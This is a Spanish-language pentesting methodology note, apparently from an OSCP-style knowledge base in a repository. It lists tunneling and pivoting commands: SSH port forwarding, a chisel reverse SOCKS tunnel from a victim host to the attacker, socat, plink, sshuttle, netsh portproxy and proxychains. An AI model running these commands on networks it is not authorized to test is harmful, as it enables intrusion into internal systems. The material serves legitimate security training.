JARVIS/nucleo/saber/conocimiento/08 - Avanzado/Tunneling.md
sito 7e06ce46cf saber: pack de metodologia publico (conocimiento/) + doc del RAG
El repo trae ahora ~73 docs de metodologia de pentesting (estilo OSCP,
scrubeados de datos personales) que indexa.py indexa: un clon recien hecho ya
sabe de enumeracion, explotacion web, shells, privesc, Active Directory,
cracking... con los comandos, sin ningun dato privado. docs/rag.md lo refleja.
2026-08-16 17:58:41 +02:00

45 lines
1.4 KiB
Markdown

# Tunneling y port forwarding
> Reenviar puertos y montar proxies para alcanzar redes internas. Alternativas a Pivoting ligolo-ng. Fuente: oscp.trastero.org/tunneling.
## SSH (el más portable)
```bash
ssh -L 8080:127.0.0.1:80 user@pivot # LOCAL: tu :8080 → servicio interno
ssh -R 3390:127.0.0.1:3389 user@kali # REMOTE: expone el RDP del pivot en tu :3390
ssh -D 1080 user@pivot # DYNAMIC: proxy SOCKS en tu :1080
# luego: proxychains <herramienta> (configura socks en /etc/proxychains4.conf)
```
## Chisel (cuando no hay SSH)
```bash
# Kali (servidor):
./chisel server -p 8000 --reverse
# Víctima (cliente) → SOCKS reverso:
./chisel client TU_IP:8000 R:socks
# ahora: proxychains nmap -sT -Pn 192.168.5.10
```
## socat (redirección simple)
```bash
socat TCP-LISTEN:8080,fork TCP:192.168.5.10:80
```
## Plink (SSH desde Windows)
```cmd
plink.exe -R 3390:127.0.0.1:3389 user@TU_IP
```
## sshuttle (VPN improvisada, lo más cómodo)
```bash
sshuttle -r user@pivot 192.168.5.0/24 --dns
```
## Windows nativo — netsh portproxy
```cmd
netsh interface portproxy add v4tov4 listenport=8080 connectaddress=192.168.5.10 connectport=80
```
## proxychains
- `proxychains nmap -sT -Pn IP` → usa `-sT` (TCP connect): el SYN scan **no** pasa por el proxy. Ver Nmap NSE.
Relacionado: Pivoting ligolo-ng · Movimiento lateral · Puesto de mando Kali · OSCP MOC